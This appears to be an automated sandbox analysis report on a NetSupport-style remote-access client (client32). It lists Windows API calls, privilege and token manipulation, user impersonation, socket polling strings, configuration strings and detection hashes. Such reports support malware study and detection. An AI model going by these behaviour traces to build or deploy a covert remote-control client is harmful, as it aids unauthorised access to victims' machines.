• K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
• SetLastError.KERNEL32(00000078), ref: 11134A11
• FreeLibrary.KERNEL32(?), ref: 11134B7B
• FreeLibrary.KERNEL32(?), ref: 11134B88
• FreeLibrary.KERNEL32(?), ref: 11134B92
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
• String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
• API String ID: 263027137-1001504656
• Opcode ID: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
• Instruction ID: db8711c19b503e7e72fae74a2cc3466c9a493194fb08fa6cc11ddefe45185306
• Opcode Fuzzy Hash: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
• Instruction Fuzzy Hash: 27B1AE78E402699FDB10CFE9CD80BADFBB5EB88319F104429E419E7648DB749884CB55
APIs
• #16.WSOCK32(00000000,009686C7,6CA93361,00000000,00000000,6CA93361,00000007), ref: 6CA8924C
• WSAGetLastError.WSOCK32(00000000,009686C7,6CA93361,00000000,00000000,6CA93361,00000007), ref: 6CA8925B
• GetTickCount.KERNEL32 ref: 6CA89274
• Sleep.KERNEL32(00000001,00000000,009686C7,6CA93361,00000000,00000000,6CA93361,00000007), ref: 6CA892A8
• GetTickCount.KERNEL32 ref: 6CA892B0
• Sleep.KERNEL32(00000014), ref: 6CA892BC
Strings
• e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6CA89226
• ReadSocket - Would block, xrefs: 6CA8928A
• *RecvTimeout, xrefs: 6CA8927B
• hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6CA8922B
• ReadSocket - Error %d reading response, xrefs: 6CA892F7
• ReadSocket - Connection has been closed by peer, xrefs: 6CA892E0
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: CountSleepTick$ErrorLast
• String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
• API String ID: 2495545493-2497412063
• Opcode ID: 00ab8be4b623ec87a65a6869ab97bd56f6a945aa9a5feb3ddf05f3523abfffa8
• Instruction ID: c0a4e24ce8e0232d5374b21ffa9896bf84763ddb8151dbd0bd85284f090f74f2
• Opcode Fuzzy Hash: 00ab8be4b623ec87a65a6869ab97bd56f6a945aa9a5feb3ddf05f3523abfffa8
• Instruction Fuzzy Hash: A231C575F02208AFDB10DFB8DA84B9E77F4EB45328F104959E919D7A40E731D9C887A1
APIs
• GetSystemTime.KERNEL32(?,?,?,9353354D,1737DA36,935334B3,FFFFFFFF,00000000), ref: 6CA931E2
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6CABECB0), ref: 6CA931EC
• GetSystemTime.KERNEL32(?,1737DA36,935334B3,FFFFFFFF,00000000), ref: 6CA9322A
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6CABECB0), ref: 6CA93234
• EnterCriticalSection.KERNEL32(6CACB898,?,9353354D), ref: 6CA932BE
• LeaveCriticalSection.KERNEL32(6CACB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6CA932D3
• GetCurrentThreadId.KERNEL32 ref: 6CA9334D
  • Part of subcall function 6CA9BA20: __strdup.LIBCMT ref: 6CA9BA3A
  • Part of subcall function 6CA9BB00: _free.LIBCMT ref: 6CA9BB2D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                                                                                    • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                                                                    • API String ID: 1510130979-3441452530
                                                                                                                                                    • Opcode ID: 0dc71f0876fab3f0fc95f03e2879bc67d1d3837deccdfacbd99f7a370255488b
                                                                                                                                                    • Instruction ID: 6b6e3d2086877a6af93966f351a8e12c4e1b470dfc9c3fb774c77a6273d93207
                                                                                                                                                    • Opcode Fuzzy Hash: 0dc71f0876fab3f0fc95f03e2879bc67d1d3837deccdfacbd99f7a370255488b
                                                                                                                                                    • Instruction Fuzzy Hash: 28617572A11209AFCB14DFA4D985EEEB7F5FF49304F04861DE416A3B40DB34A588CBA1
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                                    • _memset.LIBCMT ref: 11145CFD
                                                                                                                                                      • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                                                    • _strncpy.LIBCMT ref: 11145DCA
                                                                                                                                                      • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 11145E66
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                                                                                    • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                                                    • API String ID: 3299820421-2117887902
                                                                                                                                                    • Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                                                                                    • Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
                                                                                                                                                    • Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                                                                                    • Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                                                                                                    • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000,?,00000000,Client,silent,00000000,00000000,?,1104C49F), ref: 111168EF
                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11116914
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11116926
                                                                                                                                                    • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
                                                                                                                                                    • CoUninitialize.COMBASE(00000000), ref: 111169E1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                                                                    • String ID: SHELL32.DLL$SHGetSettings
                                                                                                                                                    • API String ID: 4195908086-2348320231
                                                                                                                                                    • Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                                                                                    • Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
                                                                                                                                                    • Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                                                                                    • Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                                                                    • API String ID: 2102423945-35127696
                                                                                                                                                    • Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                                                                                    • Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
                                                                                                                                                    • Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                                                                                    • Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
• API ID: ExceptionFilterUnhandled
• String ID: Client32$NSMWClass$NSMWClass
• API String ID: 3192549508-611217420
APIs
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00E73DD0,00E73DD0,00E73DD0,00E73DD0,00E73DD0,00E73DD0,00E73DD0,111EFB64,?,00000001,00000001), ref: 1109EDB0
• EqualSid.ADVAPI32(?,00E73DD0,?,00000001,00000001), ref: 1109EDC3
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• API ID: InformationToken$AllocateEqualInitialize
• String ID:
• API String ID: 1878589025-0
APIs
• GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,1EF76653,00080000,00000000,?), ref: 1109D88D
• OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
• LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
• AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
• String ID:
• API String ID: 2349140579-0
APIs
• AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
• CloseHandle.KERNEL32(?,00000000,1109EC30,00000244,cant create events), ref: 1109D915
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• GetSystemMetrics.USER32(00002000), ref: 1102ED54
• FindWindowA.USER32(NSMWClass,00000000), ref: 1102EF15
  • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
  • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
  • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
• GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
• OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
• IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F
  • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
  • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
  • Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F59
• SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
• WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
• CloseHandle.KERNEL32(00000000), ref: 1102EFF0
• FindWindowA.USER32(NSMWClass,00000000), ref: 1102EFFD
• GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
• IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
• LoadIconA.USER32(11000000,000004C1), ref: 1102F521
• LoadIconA.USER32(11000000,000004C2), ref: 1102F531
• DestroyCursor.USER32(00000000), ref: 1102F557
• DestroyCursor.USER32(00000000), ref: 1102F568
  • Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
  • Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
  • Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
  • Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3
• GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
• GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
• Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
• PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
• DispatchMessageA.USER32(?), ref: 11030136
• PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
• CloseHandle.KERNEL32(00000000,Function_000278D0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 110303D4
• GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
• SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
• SetWindowPos.USER32(000A0036,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 11030449
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,1105A720,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 110304CA
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • wsprintfA.USER32 ref: 11030645
                                                                                                                                                      • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,1EF76653,?,?,00000000), ref: 1112909A
                                                                                                                                                      • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
                                                                                                                                                      • Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
                                                                                                                                                    • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$358075$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed 